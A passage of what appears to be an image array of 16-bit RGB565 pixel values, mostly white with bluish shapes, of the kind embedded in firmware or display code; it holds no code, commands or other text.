0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xff9e, 0xffbe, 0xffdf, 0xffde, 0xffde, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffdd, 0xffdd, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xfffe, 0xffff, 0xf7ff, 0xcf3f, 0x3af0, 0x220d, 0x2a0d, 0x3a4f, 0x29ee, 0x2a2d, 0x2a6c, 0x224d, 0x226d, 0x224c, 0x2a4c, 0x2a4c, 0x226d, 0x226c, 0x226d, 0x324d, 0x324d, 0x2a6c, 0x2a8c, 0x222b, 0x2a4d, 0x2a2d, 0x222d, 0x3a4b, 0x320c, 0xa59a, 0xf7ff, 0xf7be, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xc75f, 0x12f2, 0x0292, 0x95dc, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0x1a2d, 0x3bf6, 0xaf7f, 0x0210, 0x1314, 0x2418, 0xefff, 0xf7ff, 0xf7de, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdc, 0xf7fd, 0xe7ff, 0x6d1a, 0x43b6, 0xe7ff, 0xffff, 0xfffc, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffde, 0xffbe, 0xfffe, 0xefbc, 0xdfff, 0x4456, 0x0af5, 0x0ad4, 0x857b, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffdd, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffbe, 0xffbe, 0xffbe, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xd77f, 0xc71e, 0xb6bd, 0xae9c, 0xb6dd, 0xc73e, 0xdf9f, 0xefdf, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xffdd, 0xffdf, 0xffdf, 0xf7ff, 0xe7df, 0xdfdf, 0xdf9f, 0xdf9f, 0xe7bf, 0xd7bf, 0xd7df, 0xd7bf, 0xd7df, 0xd7df, 0xdfdf, 0xdfdf, 0xd7ff, 0xcfff, 0xd7ff, 0xd79f, 0xdfbf, 0xd7ff, 0xcfff, 0xd7ff, 0xd7bf, 0xd7bf, 0xcfff, 0xdf7f, 0xefbf, 0xf7df, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdd, 0xffff, 0xc75f, 0x12d3, 0x0292, 0x95db, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0x7d9a, 0x024e, 0xb77f, 0x3312, 0x2b14, 0x0ab4, 0x5390, 0xb63a, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7ff, 0xcfdf, 0x1ab1, 0x1271, 0x4372, 0xcf3d, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0x8558, 0x0a2f, 0x1b77, 0x0b15, 0x3bd5, 0xf7ff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xdfdf, 0xb71f, 0xaebd, 0xa67c, 0xaebd, 0xbf1e, 0xcf9f, 0xdfff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xe7ff, 0xdfff, 0xcfdf, 0x9ebe, 0x6539, 0x33f5, 0x1b53, 0x1b32, 0x12f1, 0x1af1, 0x1b10, 0x1af0, 0x1b11, 0x1b53, 0x2bf6, 0x4499, 0x7e3d, 0xb77f, 0xdfff, 0xefff, 0xf7ff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xefbf, 0xf7ff, 0xefdf, 0xf7ff, 0xf7df, 0xefdf, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xf7df, 0xfffe, 0xffdd, 0xf7be, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xcf5f, 0x12f3, 0x0272, 0x95dc, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xb6ff, 0x01ec, 0x859a, 0x961d, 0x1251, 0x12f7, 0x12f1, 0x09ed, 0x5b94, 0x6414, 0x7d17, 0x6495, 0x5c15, 0x84f8, 0x5bd3, 0x74d6, 0x7518, 0x2b12, 0x1ad2, 0x1ad2, 0x1ab0, 0x1a4f, 0x5bb3, 0x7496, 0x74b6, 0x6475, 0x6cd7, 0x6c95, 0x6454, 0x7cf7, 0x53f4, 0x122f, 0x2b55, 0x0b15, 0x0b55, 0x020f, 0xbebe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xe7ff, 0xc79f, 0x861c, 0x4c97, 0x23b4, 0x1354, 0x1b32, 0x1b32, 0x2353, 0x1b53, 0x1312, 0x1332, 0x1b93, 0x33f4, 0x6539, 0x9ede, 0xcfdf, 0xdfff, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xbf9e, 0x7597, 0x2bf3, 0x03b4, 0x03d6, 0x0439, 0x1d1d, 0x359f, 0x561f, 0x661f, 0x763f, 0x6e1f, 0x55be, 0x2d1c, 0x047b, 0x03f9, 0x03b6, 0x0bb4, 0x44b6, 0xa6bc, 0xefff, 0xffff, 0xffde, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b2, 0x0293, 0x859c, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xf7df, 0xf7df, 0xfffe, 0xfffc, 0xfffa, 0xffda, 0xfffb, 0xfffc, 0xfffc, 0xfffd, 0xfffd, 0xfffd, 0xffdd, 0xffdb, 0xfffb, 0xfffd, 0xfffe, 0xfffe, 0xfffd, 0xffdc, 0xffde, 0xffde, 0xffdb, 0xfffa, 0xfffb, 0xffbd, 0xefff, 0xffde, 0xffdd, 0xffdc, 0xf7ff, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0xcf3f, 0x12d3, 0x0272, 0x95dc, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xe7ff, 0x53d3, 0x220b, 0xdfff, 0x33b7, 0x23dc, 0x24ba, 0x341a, 0x3339, 0x3b78, 0x1b55, 0x23d7, 0x2b97, 0x2b34, 0x3bd5, 0x2b74, 0x2b76, 0x3bf9, 0x2b95, 0x4478, 0x33f9, 0x237a, 0x3c18, 0x2b75, 0x2396, 0x2bf8, 0x1355, 0x33d6, 0x33d5, 0x2334, 0x33d8, 0x3bd9, 0x2bb7, 0x3479, 0x1c17, 0x1b94, 0x6415, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xf7ff, 0xb67b, 0x5c75, 0x2373, 0x1395, 0x0bd8, 0x0c5b, 0x1d3f, 0x5d9e, 0x661f, 0x6e5f, 0x5e3f, 0x4dff, 0x3d7f, 0x24db, 0x1418, 0x0395, 0x1394, 0x2bb3, 0x7599, 0xc77f, 0xefff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xffbf, 0xffbf, 0xffbd, 0xffff, 0xcfff, 0x4dfb, 0x03fa, 0x0375, 0x33f4, 0x6cb5, 0xc6dd, 0xd79f, 0xdfdf, 0xefff, 0xffff, 0xf7df, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xdfff, 0xbf7e, 0x8dda, 0x4477, 0x0397, 0x03bb, 0x24fe, 0x9f3f, 0xf7ff, 0xfffe, 0xffff, 0xf7df, 0xffff, 0xffdc, 0xfffe, 0xffdf, 0xf7ff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xd7df, 0x0af1, 0x02b3, 0x85bc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xc75f, 0x1ab5, 0x0a54, 0x9dbc, 0xffdf, 0xffbe, 0xffdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7be, 0xf7ff, 0x8ddb, 0x01f0, 0x6d7f, 0x9eff, 0xa71f, 0x975f, 0x96ff, 0xa73f, 0xa6ff, 0xa6bf, 0xaf3f, 0x9ebf, 0xa73f, 0xa75f, 0x8edf, 0x971f, 0x9f5f, 0x96df, 0xa77f, 0x9eff, 0x9edf, 0xaf1f, 0x9ebf, 0xa6ff, 0xa71f, 0x9e9f, 0xaf3f, 0xaeff, 0xa6bf, 0xaf7f, 0x8edf, 0x971f, 0x971f, 0x9eff, 0x8ddd, 0x42f0, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xff9d, 0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xefff, 0x96df, 0x34fb, 0x03b6, 0x1394, 0x4c14, 0x95ba, 0xcf1e, 0xe7df, 0xeffe, 0xefff, 0xffff, 0xffde, 0xffbe, 0xffff, 0xffff, 0xf7fe, 0xdf7e, 0xaebd, 0x6d38, 0x23d1, 0x0393, 0x0bf8, 0x559f, 0xc7ff, 0xeffd, 0xffbb, 0xfffe, 0xf7bf, 0xf7ff, 0xffff, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xefff, 0xa6df, 0x2bd4, 0x0b71, 0x2b93, 0x861b, 0xd7df, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffdd, 0xffbd, 0xffde, 0xffbc, 0xfffd, 0xffbc, 0xffdd, 0xffdd, 0xffff, 0xf7fe, 0xefff, 0xbf3e, 0x4c55, 0x1b52, 0x1b52, 0x6d58, 0xe7ff, 0xefff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x12b1, 0x0293, 0x8d9c, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xcf3f, 0x1ab3, 0x0a53, 0x95bc, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xf7ff, 0xdfff, 0x2af2, 0x0a30, 0x01ef, 0x124e, 0x0a6e, 0x0a4f, 0x0a0f, 0x120f, 0x11ef, 0x09ef, 0x1292, 0x0a71, 0x0ab2, 0x0271, 0x12f1, 0x022e, 0x0a2d, 0x0a0d, 0x09ee, 0x1230, 0x0a2e, 0x124f, 0x01ee, 0x0a2f, 0x0a0f, 0x09ee, 0x09ed, 0x120d, 0x09ed, 0x022e, 0x022e, 0x020e, 0x0a0d, 0x0149, 0xc6fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffbe, 0xffde, 0xefff, 0xd7ff, 0x5d19, 0x1b94, 0x1373, 0x3c55, 0xaf1f, 0xdfff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7fe, 0xefbf, 0xffff, 0xf7df, 0xf7be, 0xffff, 0xffff, 0xefff, 0xe7ff, 0xd7ff, 0x861b, 0x2373, 0x1b54, 0x23b3, 0x975f, 0xf7ff, 0xefdf, 0xffff, 0xf79f, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xe7ff, 0x553a, 0x0b96, 0x1b95, 0x75ba, 0xf7ff, 0xf7ff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xfffd, 0xffdd, 0xfffd, 0xffdc, 0xff9b, 0xff9c, 0xfffd, 0xffdd, 0xfffe, 0xfffd, 0xfffe, 0xf7fe, 0xb71c, 0x3414, 0x0b75, 0x2bf6, 0xbf5f, 0xefff, 0xf7be, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xe7ff, 0x1291, 0x0a94, 0x959c, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xffff, 0xffdf, 0xffdd, 0xfffd, 0xcf5e, 0x1ad3, 0x0273, 0x95dc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xffdd, 0xefff, 0x8559, 0x5c57, 0x5c16, 0x6476, 0x6476, 0x5c15, 0x6c57, 0x6436, 0x6457, 0x5c79, 0x1af5, 0x1317, 0x1338, 0x1b57, 0x1af3, 0x5477, 0x5434, 0x6c96, 0x6c77, 0x6417, 0x64b6, 0x5455, 0x6cf8, 0x5c96, 0x5c55, 0x8579, 0x8538, 0x7494, 0x8d78, 0x7d16, 0x7516, 0x8598, 0x6453, 0xae19, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefdf, 0xffdf, 0xffdf, 0xffff, 0xbf9f, 0x2415, 0x0bb6, 0x2bf6, 0xb71e, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7fe, 0xfffe, 0xffdf, 0xf7dd, 0xf7ff, 0xa5f8, 0xe7ff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffff, 